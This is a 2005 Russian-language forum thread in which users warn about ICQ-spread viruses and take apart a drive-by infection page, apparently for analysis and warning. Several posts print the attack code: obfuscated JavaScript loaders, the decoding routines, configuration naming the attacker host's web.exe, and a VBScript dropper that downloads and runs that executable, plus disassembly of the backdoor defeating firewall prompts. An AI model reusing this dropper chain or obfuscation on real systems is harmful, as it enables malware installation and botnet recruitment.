Крымский форум (Crimea-Board) Поиск Участники Помощь Текстовая версия Crimea-Board.Net
Здравствуйте Гость .:: Вход :: Регистрация ::. .:: Выслать повторно письмо для активации  
 
> Рекламный блок.
 
 
 
 
 
> Ваша реклама, здесь
 
 
 

  Start new topic Start Poll 

> Вирусы по ICQ
Rumata | Профиль
Дата 2 Июня, 2005, 17:13
Quote Post



The One
Group Icon

Группа: Admin
Сообщений: немеряно
Регистрация: 21.06.03
Авторитет: 77
Вне форума



название темы слегка неправильное, поскольку впарить вируса через сам протокол можно, но для массы кидисов которых сейчас навалом это сложно.
но, передают ссылками :

Цитата
[02.06.2005 11:03:00] >> Тут информация пришла: по аське идет рассылка вируса с номера 91408633, под предлогом опроса рассылается ссылка на вирус, у многих винт уже слетел. Предупреди и разошли всем, кто у тебя в контакт-списке!!!


так вот, во первых нехрень шастать без файервола и антивируса по левым ссылкам, да еще непонятно откуда присланным, во вторых абсолютно бесплатный Awast! Home довольно старательно следит за всеми сообщениями как входящими так и исходящими.

для чего тема, дабы не спамить наши контакты, складывайте подобные предупреждения сюда, больше народа увидит.


____________________
user posted image user posted image user posted image

Если что-то случилось с форумом (тьху тьху), все новости там, вступайте, подписывайтесь, присоединяйтесь ))
Бобер | Бездомный
Реклама двигатель прогресса       
Quote Post



А кому сча лехко?
Group Icon


















_________________
Желающим разместить рекламу смотреть сюдой
/   
Пэтро | Профиль
Дата 18 Июня, 2005, 23:24
Quote Post




Group Icon

Группа: Banned
Сообщений: 7119
Регистрация: 15.06.05
Авторитет: 1
Вне форума

Предупреждения:
(0%) -----


Только что получаю по аське сообщение по английски.
Привет типа зовут меня так то такто живую яхочу показать тебе свой фотоальбом заходи h t t p : // w w w . i t f . 8 m . n e t
(я не думаю что вы будете рисковать заходив туда)

Я думаю вирь на 100%, но заинтересовало как его хотят втулить и на каком принципе он работает. Так вот открывается вэб-страничка хоумпага оффигительной девушки. Есть ссылочка на Фотоальбом в *.exe
там понятно лежал троян, но самое интересное не в том, эта хоумпага открывает еще одно окно, которое запускает процесс в системе ssvchost.exe
я рассмотрел код страницы просмотрщиком и увидел данное

<script language=javascript>document.write(unescape('%3C%53%43%52%49%50%54%20%4C%

тут находится сложнейшая процедура расшифровки текста и создание новых процедур JavaScript. Самое интересное что у меня все пропатченно до уровня апреля этого года. антивирусные базы июньские стоит файрволл и 2 сервис пак и все напрасно и ничего сделать нельзя.
PMEmail Poster
2/20841   
Rumata | Профиль
Дата 18 Июня, 2005, 23:35
Quote Post



The One
Group Icon

Группа: Admin
Сообщений: немеряно
Регистрация: 21.06.03
Авторитет: 77
Вне форума



сходил, лиса сказала что нужны доп. модули для просмотра страницы которые я грузить конечно же не стал.

Добавлено в 23:37
а морда девахи знакомая чем-то ... где т я это лицо уже видел

svchost ведет себя вполне благопристойно. хотя даваль линка на альбум с экзешником это кидство.


____________________
user posted image user posted image user posted image

Если что-то случилось с форумом (тьху тьху), все новости там, вступайте, подписывайтесь, присоединяйтесь ))
Пэтро | Профиль
Дата 19 Июня, 2005, 0:00
Quote Post




Group Icon

Группа: Banned
Сообщений: 7119
Регистрация: 15.06.05
Авторитет: 1
Вне форума

Предупреждения:
(0%) -----


Цитата
хотя даваль линка на альбум с экзешником это кидство.


НУ могу и убрать это я для тестирования есть ли уязвимость у кого-то еще
я же предупредил
Цитата
(я не думаю что вы будете рисковать заходив туда)

если это конечно ко мне обращаешся

Вообще это уязвимость только IExplorer(которую к тому же я закрыть не могу)
там выполняются какието хитрые манипуляции с JavaScript, чтото очень серьезно расшифровывается.

PMEmail Poster
1/20841   
Morgul |
Дата 19 Июня, 2005, 1:42
Quote Post



Unregistered









Да, фейс хорошо узнаваем - лежит как на порно ресурсах, так и в базе знакомств Синглс.ру(Рамблер.лав.ру и т.д.).
Однако да - вирусняк.
sheonfg |
Дата 19 Июня, 2005, 2:44
Quote Post



Unregistered









Цитата
там выполняются какието хитрые манипуляции с JavaScript, чтото очень серьезно расшифровывается.

<script LANGUAGE="javascript">
document.write('empty..');
</SCRIPT>

...потом идет процедура расшифровки dF

dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*
5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>

А в строке dF зашифровано вот это:

<script LANGUAGE="javascript" SRC="foto.js">
// SAMPLE SCRIPT #2 - CALLING AN EXTERNAL JS FILE
</SCRIPT>

Короче, в отдельном окне загружается foto.js вот с таким вот кодом:
url = "http://xoce.name/top/index.html";
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type="text/css">';
asd = '<IF'+'RA'+'ME SRC="';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (cool.gif;
self.focus();
setInterval("window.status='google.com'",7);

Все это дело отправляет нас на xoce.name/top/index.html, где меня честно предупредили, что "матрица поимела меня". g.gif
Потом еще одним зашифрованным скриптом перекинули на xoce.name/traffic/index.php с ужасным предупреждением, что You IP is blocked. smile.gif
Дальше опять зашифрованный скрипт, который смотреть уже не интересно.
3/   
Пэтро | Профиль
Дата 19 Июня, 2005, 13:33
Quote Post




Group Icon

Группа: Banned
Сообщений: 7119
Регистрация: 15.06.05
Авторитет: 1
Вне форума

Предупреждения:
(0%) -----


Я так понял что все эти завароты с зашифрованными скриптами нужны для того чтоб отключить встроенную в SP2 защиту от всплывающих окон. А как же оно процесс на атакуемой машине создает?

Цитата
А в строке dF зашифровано вот это:


И как ты расшифровываешь?
PMEmail Poster
sheonfg |
Дата 19 Июня, 2005, 23:53
Quote Post



Unregistered









Цитата
И как ты расшифровываешь?


Сама процедура расшифровки закодирована в document.write(unescape('%3C%53%.....69%70%74%3E'));
Подробнее о способах защиты контента пожно прочитать здесь
Проще всего раскодировать скрипт, например, в штирлице
Скормив штирлицу текст из функции unescape(), получаем саму процедуру раскодирования строки DF.
Вот она:
<script language="javascript">
function dF(s){var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
</script>

После этого создаем файл html вот с таким кодом:
<html>
<script language="javascript">
function dF(s){var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
s2=(unescape(t));
document.write (t);
}
dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')
</script>
</html>

Запускаем и получаем почти раскодированную строку DF.
После этого опять скармливаем ее штирлицу и перед нами то, что от нас хотели скрыть. wink.gif

===========================================================

Еще немного о так называемом "фотоальбоме" wink.gif photos.exe.
Это обычный Trojan-Downloader размером 4608 байт. Написан вроде ассемблере и основная его функция - это загрузить и запуститть ГЛАВНЫЙ вирус.
Я этот downloader разобрал по запчастям и нашел откуда скачивается основной вирус:


service.exe - также был разобран. Написан на С++ размером 39 424 байт и даже ничем не запакован. (странно)
Мне касперский деньги за исследование не платит (кстати AVP с сегодняшними базами его никак не опознал),
поэтому я только поверхностно посмотрел что он делает.
Прописывает себя в автозагрузку SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
создает файлы hosts.dll, __dcmbot0, c:\client.txt, c:\ClientSend.bin, c:\ClientRecv.bin и еще какие-то...


В общем, похоже, это все дело служит для организации ботнетов и последующих DDOS.
Компу вроде никакого вреда не наносится, а просто он становиться инструментом в чьих-то руках.
3/   
Пэтро | Профиль
Дата 20 Июня, 2005, 13:02
Quote Post




Group Icon

Группа: Banned
Сообщений: 7119
Регистрация: 15.06.05
Авторитет: 1
Вне форума

Предупреждения:
(0%) -----


Меня интересовал не троян(что в трояне может быть интересного), а способ запуска процесса. Ведь вроде все дыры закрыты файрволл стоит, а процесс какимто боком запускается.

Кстати Штирлиц классная вещь, только баннер вешает.

В итоге я получил:
Код

<script language=JavaScript>
function decrypt_p(x){
var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,32,35,34,25,5,1,19,8,0,0,0,
0,0,0,9,60,45,54,21,29,38,47,15,50,41,57,46,48,23,36,14,4,12,28,2,30,42,43,27,10,
37,0,0,0,0,40,0,44,24,7,61,13,17,31,62,56,39,0,33,16,58,59,18,55,52,51,6,53,22,3,
26,11,20);
for(j=Math.ceil(l/B);j>0;j--){
r='';
for(i=Math.min(l,B);i>0;i--,l--){
w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}
else{s=6}}document.write®}
}
decrypt_p("64nW5CSr9jAF_hxFewR17G@VGF@Ikce16CSrfNe4k8erRHeFcxLIyceMyc
e41sEukgbltWAIfwAIf3KlfwSqfWbsf3SIUv_1e8AuvwSrbYesycaIpXe4zU@OzUiF_hxFf
sSr@wAF5VbrRcEIkG@VGFJufsEIkG@VGIYWHv_qFw0dCWhdgv9rNjS3cCBItwA4QGR
scI9C_hYW5V_ufsEIkG@VGFJutgesDcEl@8AITwe1TwRFchP188adtgesDcdl6xdut3Klt
WAIwGisvgiF5V_utgesDcdF_hxFvXAuRNEr6FR1yyRrQyRMbUioQHe1CXAuRNErcv_uN
XRFchauYCSrQGisvgiF5V_utgesDcdF_hxF9wSrQNiIQ3RMbU91mcEsYgdl6xaIyceMyce
FcCBItwAlX4nW5Vbsk8SMX4nW5UaI7sdF_hYVG4nW5Vbsf3SIX4nW")
</script>

Вот тут то и зашифрована процедура взлома. Только как ее достать?

У меня предположение, что експлоит основан на известной уязвимости IE по парсингу *.chm файлов.
PMEmail Poster
1/20841   
Пэтро | Профиль
Дата 20 Июня, 2005, 13:32
Quote Post




Group Icon

Группа: Banned
Сообщений: 7119
Регистрация: 15.06.05
Авторитет: 1
Вне форума

Предупреждения:
(0%) -----


Я строку document.write® заменил на document.write(escape®), чтобы вывод был на экран. Далее открыл полученый код штирлицем получилось.
Код
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title></title>
<style>
 * {CURSOR: url("xoce.ani")}
</style>
<script language="JavaScript" src="conf.js"></script>
<script language="JavaScript" src="js/hta.js"></script>
<meta name="author" content="xoce">
</head>
<body>
</html>


conf.js
Код
var UrlPath="http://xoce.name/traffic/web.exe";
var Url="http://xoce.name/traffic/js/";
var ExeFile="web.exe";
var tagstyle='style="display:none"';
var ObjCLSID="clsid:72967901-68EC-1109-B729-00AA006000B7";
var ObjCLSID2="clsid:7BD29E00-76C1-11CF-9DD0-00A0C9000073";
var MXML="Microsoft.XMLHTTP";
var ADSt="ADODB.Stream";


js/hta.js
Код
/* author: xoce */
/* Creation date: 26.02.2005 */
/* Hta уязвимость пробивает все версии 98-ME-Win2K-SP0 и непатченные SP1 */

try{
document.write('<object data='+Url+'in.php></object>');
}
catch(e){}


Это уже веселее, тем более комментарии русские(не мои, автора)

in.php
Код
<script language="vbs">
'
'
'
Set shell=CreateObject("WScript.Shell")
'Ebal Ya V Rot Kaspera
ebar = "eb_tvou.mat"
Set fso = CreateObject("Scripting.FileSystemObject")
Set OLEr = fso.CreateTextFile(ebar)
for y = 1 to 5
OLEr.Write "Kasperskiy - Pidor" + chr(13) + chr(10)
next
OLEr.close
megret="PTTHLMX.2lmxsM"

ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe"
set dot=CreateObject(strreverse(megret))
dot.Open "GET", "../web.exe", false

dot.Send()
cs = dot.responseBody
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile(ddd)
for i = 0 to UBound(cs)
inta=1
intb=2
intc=int(intb)-int(inta)
c = ascb(midb(cs, i+1, 1))
f.Write chr(c)
next
f.close
shell.run(ddd)
window.close()
</script>

Нецензурные ругательства на касперского и.т.д.

вот и все ../web.exe запускается причем не только на
Цитата
Hta уязвимость пробивает все версии 98-ME-Win2K-SP0 и непатченные SP1

Но и на XP prof SP2 пропатченная по уровню мая 2005 года

P.S. Сколько не патчу все равно работает.
P.P.S. C Operой все ок.
PMEmail Poster
3/20841   
Пэтро | Профиль
Дата 20 Июня, 2005, 15:49
Quote Post




Group Icon

Группа: Banned
Сообщений: 7119
Регистрация: 15.06.05
Авторитет: 1
Вне форума

Предупреждения:
(0%) -----


Листинг дизассемблированного web.exe показывает интересный подход:
Код
* Reference To: USER32.FindWindowExA, Ord:0100h
                                 |
:004011F3 FF15C8504000            Call dword ptr [004050C8]
:004011F9 3BC6                    cmp eax, esi
:004011FB 89442410                mov dword ptr [esp+10], eax
:004011FF 740F                    je 00401210
:00401201 56                      push esi
:00401202 56                      push esi
:00401203 55                      push ebp
:00401204 50                      push eax
:00401205 FFD7                    call edi
:00401207 56                      push esi
:00401208 56                      push esi
:00401209 53                      push ebx
:0040120A FF74241C                push [esp+1C]
:0040120E FFD7                    call edi

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:004011E9(C), :004011FF(C)
|

* Possible StringData Ref from Data Obj ->"Hidden Process Requests Network "
                                       ->"Access"
                                 |
:00401210 68C0614000              push 004061C0
:00401215 56                      push esi

* Reference To: USER32.FindWindowA, Ord:0100h
                                 |
:00401216 FF15C4504000            Call dword ptr [004050C4]
:0040121C 3BC6                    cmp eax, esi
:0040121E 7425                    je 00401245

* Possible StringData Ref from Data Obj ->"OK"
                                 |
:00401220 68E8614000              push 004061E8
:00401225 56                      push esi
:00401226 56                      push esi
:00401227 50                      push eax


Ищутся всплывающие окна фарволлов и на вопросы типа
"Hidden Process Requests Network" нажимается кнопка ОК

Код
* Possible StringData Ref from Data Obj ->"Windows Security Alert"
                                 |
:00401245 68A8614000              push 004061A8
:0040124A 56                      push esi

* Reference To: USER32.FindWindowA, Ord:0100h
                                 |
:0040124B FF15C4504000            Call dword ptr [004050C4]
:00401251 3BC6                    cmp eax, esi
:00401253 7425                    je 0040127A

* Possible StringData Ref from Data Obj ->"&Unblock"
                                 |
:00401255 689C614000              push 0040619C
:0040125A 56                      push esi
:0040125B 56                      push esi
:0040125C 50                      push eax

и.т.д.


PMEmail Poster
3/20841   
sheonfg |
Дата 20 Июня, 2005, 19:37
Quote Post



Unregistered









Вот тут автор (xoce) продавал свой набор эксплоитов для IE. Там же и про web.exe вспомнили -
web.exe является backdoor'ом Backdoor.Win32.Small.dh.
3/   
Пэтро | Профиль
Дата 20 Июня, 2005, 19:57
Quote Post




Group Icon

Группа: Banned
Сообщений: 7119
Регистрация: 15.06.05
Авторитет: 1
Вне форума

Предупреждения:
(0%) -----


Цитата
Вот тут автор (xoce) продавал свой набор эксплоитов для IE.

Кошмар что я могу сказать.

Цитата
По умолчанию все 12 эксплойтов включены в одну странчику index.php ( вы можете убирать и добавлять их по желанию )

Также к ним прилагается скрипт админки на php с учетом "посещаемости" и заражаемости, учетом запущенных проксиков


Только вот невоткну зачем это надо? Покупать эти все експлоиты и админки?
Какой толк можно поиметь от них?
PMEmail Poster
sheonfg |
Дата 20 Июня, 2005, 20:08
Quote Post



Unregistered









Цитата
Какой толк можно поиметь от них?

Я там писал выше,- организация ботнетов.
Эти сети довольно дорого можно продать или даже в аренду сдавать smile.gif
Rumata | Профиль
Дата 30 Июня, 2005, 12:06
Quote Post



The One
Group Icon

Группа: Admin
Сообщений: немеряно
Регистрация: 21.06.03
Авторитет: 77
Вне форума




Цитата
Скажите всем своим контактам,которые в ICQ,что бы контакт King of the tyranny (269337391) не принимать!Это вирус!Перешлите всем своим контактам


____________________
user posted image user posted image user posted image

Если что-то случилось с форумом (тьху тьху), все новости там, вступайте, подписывайтесь, присоединяйтесь ))
Пэтро | Профиль
Дата 30 Июня, 2005, 12:12
Quote Post




Group Icon

Группа: Banned
Сообщений: 7119
Регистрация: 15.06.05
Авторитет: 1
Вне форума

Предупреждения:
(0%) -----


А каково воздействие?
PMEmail Poster

Topic Options Start new topic Start Poll 

 



[ Script Execution time: 0.0762 ]   [ 12 queries used ]   [ GZIP включён ]


Создание и продвижение сайтов в Крыму



Top